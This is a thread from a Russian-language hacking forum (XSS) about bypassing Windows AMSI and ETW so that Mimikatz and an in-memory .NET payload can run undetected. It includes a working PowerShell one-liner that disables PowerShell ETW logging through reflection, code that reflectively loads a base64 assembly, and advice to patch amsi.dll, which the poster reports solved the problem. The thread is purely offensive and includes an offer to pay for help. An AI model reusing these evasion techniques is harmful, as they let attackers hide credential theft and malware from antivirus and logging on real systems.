• XSS.stack #1 – первый литературный журнал от юзеров форума

AMSI и ETW

WhiteDragon

AMSI bypass
Пользователь
Реакции
137
Депозит
0.0051
Есть самопис обфускатор на амси патч: работает так - патчит амси, после проверяет все ли успешно, декодирует полезную загрузку и исполняет
Перед обуф кодом пишем в консоль "Invoke-Mimikatz" ловим детект, но после патча все отлично. Тут я пытаюсь загрузить exe .NET сборку в память:
Код:
$bytes = [System.Convert]::FromBase64String($b64file);
$RAS = [System.Reflection.Assembly]::Load($bytes)
После ловлю ошибку
Код:
Exception calling "Load" with "1" argument(s): "Could not load file or assembly '2334208 bytes loaded from AnonymouslyHosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. Anattempt was made to load a program with an incorrect format."
Я думаю пропатчить etw:
Код:
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)

Но все равно выкидывает ошибку. Т.е. пропускает грязный код пш, но не дает загрузить сборку в память
А если отключить авер то строку "Invoke-mimikatz" соотвесвтенно не детектит и все грузит на ура!

Кто сталкивался и кто может помочь?
Если есть решение на пш в стороне не останусь - закину монету.

p.s. года полтора назад столкнулся с этой проблемой но как-то решил, но не помню...

Пожалуйста, обратите внимание, что пользователь заблокирован
Так а как патчит? Если, допустим, ты установил amsiInitFailed у поверщелла, то это никаким образом к дотнетам и assembly.load не будет относиться. Если ты там код amsi.dll пропатчил, то будет относиться.

Так а как патчит? Если, допустим, ты установил amsiInitFailed у поверщелла, то это никаким образом к дотнетам и assembly.load не будет относиться. Если ты там код amsi.dll пропатчил, то будет относиться.
установил amsiInitFailed. Думаешь еще надо раста маусом amsi.dll пропатчить?

Пожалуйста, обратите внимание, что пользователь заблокирован
установил amsiInitFailed. Думаешь еще надо раста маусом amsi.dll пропатчить?
Попробуй.

Попробуй.
Обычным раста-маусом работает гуд, проблема решена. Но я использовал другой аналог.
Спасибр Рел

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх